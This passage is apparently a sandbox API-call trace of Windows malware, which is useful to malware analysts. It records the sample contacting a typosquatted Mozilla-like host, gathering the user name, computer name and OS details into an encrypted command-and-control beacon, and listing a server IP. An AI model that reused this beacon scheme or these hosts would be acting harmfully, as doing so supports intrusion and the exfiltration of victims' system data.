Size=0x151) returned 0x2c59b28 [0200.852] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0200.852] lstrcatA (in: lpString1="/fonts/", lpString2="L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS" | out: lpString1="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS") returned="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS" [0200.852] lstrcpyA (in: lpString1=0x2c5fa38, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0200.852] lstrcpyA (in: lpString1=0x2be00d8, lpString2="trackingg-protectioon.cdn4.mozilla.net" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net") returned="trackingg-protectioon.cdn4.mozilla.net" [0200.852] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net", lpString2="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS" [0200.852] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS", lpString2=".bak" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak" [0200.852] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0200.852] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c4 [0200.852] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak") returned 378 [0200.852] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x17b) returned 0x2c5fba0 [0200.852] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x17b) returned 0x2c5fd28 [0200.852] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak", wMatch=0x2f) returned="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak" [0200.853] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak", wMatch=0x3f) returned 0x0 [0200.853] memcpy (in: _Dst=0x2c5fba0, _Src=0x2be00d8, _Size=0x26 | out: _Dst=0x2c5fba0) returned 0x2c5fba0 [0200.853] lstrcpyA (in: lpString1=0x2c5fd28, lpString2="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak" | out: lpString1="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak") returned="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak" [0200.853] lstrlenA (lpString="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak") returned 340 [0200.853] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2a9) returned 0x2be08e0 [0200.853] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak", lpdwBufferLength=0x11ff040) returned 1 [0200.854] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd28 | out: hHeap=0x2860000) returned 1 [0200.854] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0200.854] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0200.854] ResetEvent (hEvent=0x3a0) returned 1 [0200.854] InternetConnectA (hInternet=0xcc0004, lpszServerName="trackingg-protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0200.855] SetEvent (hEvent=0x3a0) returned 1 [0200.855] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0200.855] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0200.855] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0200.855] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0200.855] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0200.855] ResetEvent (hEvent=0x3a0) returned 1 [0200.855] ResetEvent (hEvent=0x1c4) returned 1 [0200.855] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0200.855] GetLastError () returned 0x3e5 [0200.855] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x0) returned 0x102 [0200.855] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0200.855] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x3a0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0200.861] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x0) returned 0x0 [0200.861] SetEvent (hEvent=0x3a0) returned 1 [0200.861] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0210.868] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0210.869] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0210.870] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0210.870] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0210.870] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0210.870] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0210.870] CloseHandle (hObject=0x3a0) returned 1 [0210.870] CloseHandle (hObject=0x1c4) returned 1 [0210.872] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fba0 | out: hHeap=0x2860000) returned 1 [0210.873] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be08e0 | out: hHeap=0x2860000) returned 1 [0210.874] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0210.875] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0210.876] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0210.876] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f250 | out: hHeap=0x2860000) returned 1 [0210.877] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0210.879] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0210.879] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0220.896] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0220.896] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0220.896] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0220.896] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0220.897] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0220.897] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2883122178324) returned 1 [0220.897] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28831") returned 13 [0220.897] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0220.897] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0220.897] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0220.897] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0220.900] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0220.900] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0220.900] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0220.900] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0220.900] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0220.900] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0220.904] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0220.904] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0220.904] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0220.904] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0220.904] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0220.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHwvILLog81/z8ABmqSJCyFQY/dzk", lpUsedDefaultChar=0x0) returned 20 [0220.904] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0220.906] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0220.906] lstrlenA (lpString="80.77.25.109") [0220.906] lstrlenA (lpString="80.77.25.109") returned 12 [0220.906] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd) returned 0x2c5ea50 [0220.906] memcpy (in: _Dst=0x2c5ea50, _Src=0x2c59e72, _Size=0xc | out: _Dst=0x2c5ea50) returned 0x2c5ea50 [0220.906] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0220.906] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2be00d8 [0220.906] GetTickCount () returned 0x1b4f711 [0220.906] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x8) returned 0x2c59a68 [0220.906] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x9) returned 0x2c5ea68 [0220.906] lstrlenA (lpString="%s=%s&") returned 6 [0220.906] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16) returned 0x2c59a78 [0220.906] sprintf (_Dest=0x2c59a78, _Format="%s=%s&") [0220.906] sprintf (in: _Dest=0x2c59a78, _Format="%s=%s&" | out: _Dest="oohtykbw=mrrndgw&") returned 17 [0220.906] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea68 | out: hHeap=0x2860000) returned 1 [0220.906] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0220.906] lstrlenA (lpString="oohtykbw=mrrndgw&") returned 17 [0220.906] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28831&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0220.906] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd7) returned 0x2c59b28 [0220.907] strcpy (_Dest=0x2c59b28, _Source="oohtykbw=mrrndgw&") [0220.907] strcpy (in: _Dest=0x2c59b28, _Source="oohtykbw=mrrndgw&" | out: _Dest="oohtykbw=mrrndgw&") returned="oohtykbw=mrrndgw&" [0220.907] lstrcatA (lpString1="oohtykbw=mrrndgw&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28831&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0220.907] lstrcatA (in: lpString1="oohtykbw=mrrndgw&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28831&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="oohtykbw=mrrndgw&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28831&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="oohtykbw=mrrndgw&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28831&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0220.907] lstrlenA (lpString="oohtykbw=mrrndgw&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28831&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 214 [0220.907] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0220.907] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0220.911] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0220.911] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0220.911] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d2f8) returned 1 [0220.911] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0220.911] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0220.911] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c08 [0220.911] memcpy (in: _Dst=0x2c59c08, _Src=0x2c59b28, _Size=0x10 | out: _Dst=0x2c59c08) returned 0x2c59c08 [0220.911] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.911] memcpy (in: _Dst=0x2c59c18, _Src=0x2c59b38, _Size=0x10 | out: _Dst=0x2c59c18) returned 0x2c59c18 [0220.911] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10) 